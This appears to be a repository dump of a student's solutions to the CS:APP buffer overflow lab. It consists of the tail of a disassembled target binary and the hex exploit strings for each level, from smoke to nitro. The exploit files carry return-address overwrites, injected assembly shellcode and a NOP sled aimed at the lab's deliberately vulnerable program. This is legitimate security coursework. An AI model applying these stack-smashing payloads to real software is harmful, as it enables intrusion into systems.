8049cfc: 83 c4 2c add $0x2c,%esp 1520 | 8049cff: 5b pop %ebx 1521 | 8049d00: 5e pop %esi 1522 | 8049d01: 5f pop %edi 1523 | 8049d02: 5d pop %ebp 1524 | 8049d03: c3 ret 1525 | 1526 | 08049d04 : 1527 | 8049d04: 55 push %ebp 1528 | 8049d05: 89 e5 mov %esp,%ebp 1529 | 8049d07: 53 push %ebx 1530 | 8049d08: 83 ec 24 sub $0x24,%esp 1531 | 8049d0b: 8b 45 08 mov 0x8(%ebp),%eax 1532 | 8049d0e: 8b 5d 14 mov 0x14(%ebp),%ebx 1533 | 8049d11: 83 7d 10 00 cmpl $0x0,0x10(%ebp) 1534 | 8049d15: 74 23 je 8049d3a 1535 | 8049d17: 8b 45 0c mov 0xc(%ebp),%eax 1536 | 8049d1a: 89 44 24 04 mov %eax,0x4(%esp) 1537 | 8049d1e: c7 04 24 3d a5 04 08 movl $0x804a53d,(%esp) 1538 | 8049d25: e8 66 ea ff ff call 8048790 1539 | 8049d2a: 66 c7 03 4f 4b movw $0x4b4f,(%ebx) 1540 | 8049d2f: c6 43 02 00 movb $0x0,0x2(%ebx) 1541 | 8049d33: b8 00 00 00 00 mov $0x0,%eax 1542 | 8049d38: eb 4c jmp 8049d86 1543 | 8049d3a: 85 c0 test %eax,%eax 1544 | 8049d3c: 74 3a je 8049d78 1545 | 8049d3e: 80 38 00 cmpb $0x0,(%eax) 1546 | 8049d41: 74 35 je 8049d78 1547 | 8049d43: 89 5c 24 18 mov %ebx,0x18(%esp) 1548 | 8049d47: 8b 55 0c mov 0xc(%ebp),%edx 1549 | 8049d4a: 89 54 24 14 mov %edx,0x14(%esp) 1550 | 8049d4e: c7 44 24 10 54 a5 04 movl $0x804a554,0x10(%esp) 1551 | 8049d55: 08 1552 | 8049d56: 89 44 24 0c mov %eax,0xc(%esp) 1553 | 8049d5a: c7 44 24 08 5b a5 04 movl $0x804a55b,0x8(%esp) 1554 | 8049d61: 08 1555 | 8049d62: c7 44 24 04 26 47 00 movl $0x4726,0x4(%esp) 1556 | 8049d69: 00 1557 | 8049d6a: c7 04 24 30 a5 04 08 movl $0x804a530,(%esp) 1558 | 8049d71: e8 63 f6 ff ff call 80493d9 1559 | 8049d76: eb 0e jmp 8049d86 1560 | 8049d78: 66 c7 03 4f 4b movw $0x4b4f,(%ebx) 1561 | 8049d7d: c6 43 02 00 movb $0x0,0x2(%ebx) 1562 | 8049d81: b8 00 00 00 00 mov $0x0,%eax 1563 | 8049d86: 83 c4 24 add $0x24,%esp 1564 | 8049d89: 5b pop %ebx 1565 | 8049d8a: 5d pop %ebp 1566 | 8049d8b: c3 ret 1567 | 1568 | 08049d8c : 1569 | 8049d8c: 55 push %ebp 1570 | 8049d8d: 89 e5 mov %esp,%ebp 1571 | 8049d8f: 8b 4d 08 mov 0x8(%ebp),%ecx 1572 | 8049d92: 
0f b6 11 movzbl (%ecx),%edx 1573 | 8049d95: 84 d2 test %dl,%dl 1574 | 8049d97: 74 19 je 8049db2 1575 | 8049d99: b8 00 00 00 00 mov $0x0,%eax 1576 | 8049d9e: 6b c0 67 imul $0x67,%eax,%eax 1577 | 8049da1: 83 c1 01 add $0x1,%ecx 1578 | 8049da4: 0f be d2 movsbl %dl,%edx 1579 | 8049da7: 01 d0 add %edx,%eax 1580 | 8049da9: 0f b6 11 movzbl (%ecx),%edx 1581 | 8049dac: 84 d2 test %dl,%dl 1582 | 8049dae: 75 ee jne 8049d9e 1583 | 8049db0: eb 05 jmp 8049db7 1584 | 8049db2: b8 00 00 00 00 mov $0x0,%eax 1585 | 8049db7: 5d pop %ebp 1586 | 8049db8: c3 ret 1587 | 1588 | 08049db9 : 1589 | 8049db9: 55 push %ebp 1590 | 8049dba: 89 e5 mov %esp,%ebp 1591 | 8049dbc: 8b 55 08 mov 0x8(%ebp),%edx 1592 | 8049dbf: 89 d1 mov %edx,%ecx 1593 | 8049dc1: c1 e9 1c shr $0x1c,%ecx 1594 | 8049dc4: b8 00 00 00 00 mov $0x0,%eax 1595 | 8049dc9: 85 c9 test %ecx,%ecx 1596 | 8049dcb: 74 2f je 8049dfc 1597 | 8049dcd: 80 fa 0a cmp $0xa,%dl 1598 | 8049dd0: 74 17 je 8049de9 1599 | 8049dd2: b9 08 00 00 00 mov $0x8,%ecx 1600 | 8049dd7: 89 d0 mov %edx,%eax 1601 | 8049dd9: d3 e8 shr %cl,%eax 1602 | 8049ddb: 3c 0a cmp $0xa,%al 1603 | 8049ddd: 74 11 je 8049df0 1604 | 8049ddf: 83 c1 08 add $0x8,%ecx 1605 | 8049de2: 83 f9 20 cmp $0x20,%ecx 1606 | 8049de5: 75 f0 jne 8049dd7 1607 | 8049de7: eb 0e jmp 8049df7 1608 | 8049de9: b8 00 00 00 00 mov $0x0,%eax 1609 | 8049dee: eb 0c jmp 8049dfc 1610 | 8049df0: b8 00 00 00 00 mov $0x0,%eax 1611 | 8049df5: eb 05 jmp 8049dfc 1612 | 8049df7: b8 01 00 00 00 mov $0x1,%eax 1613 | 8049dfc: 5d pop %ebp 1614 | 8049dfd: c3 ret 1615 | 1616 | 08049dfe : 1617 | 8049dfe: 55 push %ebp 1618 | 8049dff: 89 e5 mov %esp,%ebp 1619 | 8049e01: 53 push %ebx 1620 | 8049e02: 83 ec 14 sub $0x14,%esp 1621 | 8049e05: 8b 45 08 mov 0x8(%ebp),%eax 1622 | 8049e08: 89 04 24 mov %eax,(%esp) 1623 | 8049e0b: e8 7c ff ff ff call 8049d8c 1624 | 8049e10: 89 04 24 mov %eax,(%esp) 1625 | 8049e13: e8 48 ea ff ff call 8048860 1626 | 8049e18: e8 d3 ea ff ff call 80488f0 1627 | 8049e1d: 89 c3 mov %eax,%ebx 1628 | 8049e1f: 89 
04 24 mov %eax,(%esp) 1629 | 8049e22: e8 92 ff ff ff call 8049db9 1630 | 8049e27: 85 c0 test %eax,%eax 1631 | 8049e29: 74 ed je 8049e18 1632 | 8049e2b: 89 d8 mov %ebx,%eax 1633 | 8049e2d: 83 c4 14 add $0x14,%esp 1634 | 8049e30: 5b pop %ebx 1635 | 8049e31: 5d pop %ebp 1636 | 8049e32: c3 ret 1637 | 8049e33: 66 90 xchg %ax,%ax 1638 | 8049e35: 66 90 xchg %ax,%ax 1639 | 8049e37: 66 90 xchg %ax,%ax 1640 | 8049e39: 66 90 xchg %ax,%ax 1641 | 8049e3b: 66 90 xchg %ax,%ax 1642 | 8049e3d: 66 90 xchg %ax,%ax 1643 | 8049e3f: 90 nop 1644 | 1645 | 08049e40 <__libc_csu_init>: 1646 | 8049e40: 55 push %ebp 1647 | 8049e41: 57 push %edi 1648 | 8049e42: 31 ff xor %edi,%edi 1649 | 8049e44: 56 push %esi 1650 | 8049e45: 53 push %ebx 1651 | 8049e46: e8 65 eb ff ff call 80489b0 <__x86.get_pc_thunk.bx> 1652 | 8049e4b: 81 c3 b5 21 00 00 add $0x21b5,%ebx 1653 | 8049e51: 83 ec 1c sub $0x1c,%esp 1654 | 8049e54: 8b 6c 24 30 mov 0x30(%esp),%ebp 1655 | 8049e58: 8d b3 0c ff ff ff lea -0xf4(%ebx),%esi 1656 | 8049e5e: e8 d9 e8 ff ff call 804873c <_init> 1657 | 8049e63: 8d 83 08 ff ff ff lea -0xf8(%ebx),%eax 1658 | 8049e69: 29 c6 sub %eax,%esi 1659 | 8049e6b: c1 fe 02 sar $0x2,%esi 1660 | 8049e6e: 85 f6 test %esi,%esi 1661 | 8049e70: 74 27 je 8049e99 <__libc_csu_init+0x59> 1662 | 8049e72: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 1663 | 8049e78: 8b 44 24 38 mov 0x38(%esp),%eax 1664 | 8049e7c: 89 2c 24 mov %ebp,(%esp) 1665 | 8049e7f: 89 44 24 08 mov %eax,0x8(%esp) 1666 | 8049e83: 8b 44 24 34 mov 0x34(%esp),%eax 1667 | 8049e87: 89 44 24 04 mov %eax,0x4(%esp) 1668 | 8049e8b: ff 94 bb 08 ff ff ff call *-0xf8(%ebx,%edi,4) 1669 | 8049e92: 83 c7 01 add $0x1,%edi 1670 | 8049e95: 39 f7 cmp %esi,%edi 1671 | 8049e97: 75 df jne 8049e78 <__libc_csu_init+0x38> 1672 | 8049e99: 83 c4 1c add $0x1c,%esp 1673 | 8049e9c: 5b pop %ebx 1674 | 8049e9d: 5e pop %esi 1675 | 8049e9e: 5f pop %edi 1676 | 8049e9f: 5d pop %ebp 1677 | 8049ea0: c3 ret 1678 | 8049ea1: eb 0d jmp 8049eb0 <__libc_csu_fini> 1679 | 8049ea3: 90 nop 1680 | 8049ea4: 
90 nop 1681 | 8049ea5: 90 nop 1682 | 8049ea6: 90 nop 1683 | 8049ea7: 90 nop 1684 | 8049ea8: 90 nop 1685 | 8049ea9: 90 nop 1686 | 8049eaa: 90 nop 1687 | 8049eab: 90 nop 1688 | 8049eac: 90 nop 1689 | 8049ead: 90 nop 1690 | 8049eae: 90 nop 1691 | 8049eaf: 90 nop 1692 | 1693 | 08049eb0 <__libc_csu_fini>: 1694 | 8049eb0: f3 c3 repz ret 1695 | 8049eb2: 66 90 xchg %ax,%ax 1696 | 1697 | Disassembly of section .fini: 1698 | 1699 | 08049eb4 <_fini>: 1700 | 8049eb4: 53 push %ebx 1701 | 8049eb5: 83 ec 08 sub $0x8,%esp 1702 | 8049eb8: e8 f3 ea ff ff call 80489b0 <__x86.get_pc_thunk.bx> 1703 | 8049ebd: 81 c3 43 21 00 00 add $0x2143,%ebx 1704 | 8049ec3: 83 c4 08 add $0x8,%esp 1705 | 8049ec6: 5b pop %ebx 1706 | 8049ec7: c3 ret 1707 | -------------------------------------------------------------------------------- /buflab-handout.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/buflab-handout.tar -------------------------------------------------------------------------------- /buflab.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/buflab.pdf -------------------------------------------------------------------------------- /hex2raw: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/hex2raw -------------------------------------------------------------------------------- /level0_smoke/smoke_U201315075.txt: -------------------------------------------------------------------------------- 1 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 8b 04 08 2 | 

--------------------------------------------------------------------------------
/level1_fizz/fizz_U201315075.txt:
--------------------------------------------------------------------------------
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7a 8b 04 08 00 00 00 00 26 05 8f 2d

--------------------------------------------------------------------------------
/level2_bang/bang.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/level2_bang/bang.o

--------------------------------------------------------------------------------
/level2_bang/bang.s:
--------------------------------------------------------------------------------
movl $0x2d8f0526, 0x0804d100
pushl $0x08048bc5
ret

--------------------------------------------------------------------------------
/level2_bang/bang_U201315075.txt:
--------------------------------------------------------------------------------
c7 05 00 d1 04 08 26 05 8f 2d 68 c5 8b 04 08 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 34 68 55

--------------------------------------------------------------------------------
/level3_bomb/bomb.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/level3_bomb/bomb.o

--------------------------------------------------------------------------------
/level3_bomb/bomb.s:
--------------------------------------------------------------------------------
movl $0x2d8f0526,%eax
push $0x08048cd6
ret

--------------------------------------------------------------------------------
/level3_bomb/bomb2.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/level3_bomb/bomb2.o

--------------------------------------------------------------------------------
/level3_bomb/bomb2.s:
--------------------------------------------------------------------------------
movl $0x2d8f0526,%eax
movl $0x55683490,%ebp
push $0x08048cd6
ret

--------------------------------------------------------------------------------
/level3_bomb/bomb2_U201315075.txt:
--------------------------------------------------------------------------------
b8 26 05 8f 2d bd 90 34 68 55 68 d6 8c 04 08 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 34 68 55

--------------------------------------------------------------------------------
/level3_bomb/bomb_U201315075.txt:
--------------------------------------------------------------------------------
b8 26 05 8f 2d 68 d6 8c 04 08 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 34 68 55 38 34 68 55

--------------------------------------------------------------------------------
/level4_nitro/nitro.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/level4_nitro/nitro.o

--------------------------------------------------------------------------------
/level4_nitro/nitro.s:
--------------------------------------------------------------------------------
mov $0x2d8f0526,%eax
lea 0x28(%esp),%ebp
push $0x08048d42
ret

--------------------------------------------------------------------------------
/level4_nitro/nitro_U201315075.txt:
--------------------------------------------------------------------------------
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90

90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90

90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90

90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90

90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90

90 90 90 90 90 90 90 90 90 b8
26 05 8f 2d 8d 6c 24 28 68 42
8d 04 08 c3 c8 32 68 55

--------------------------------------------------------------------------------
/makecookie:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zhwhong/Bufbomb_CSAPP/9c1fa9fccdad720c5d00bfddfcc5112218e4c7b0/makecookie
--------------------------------------------------------------------------------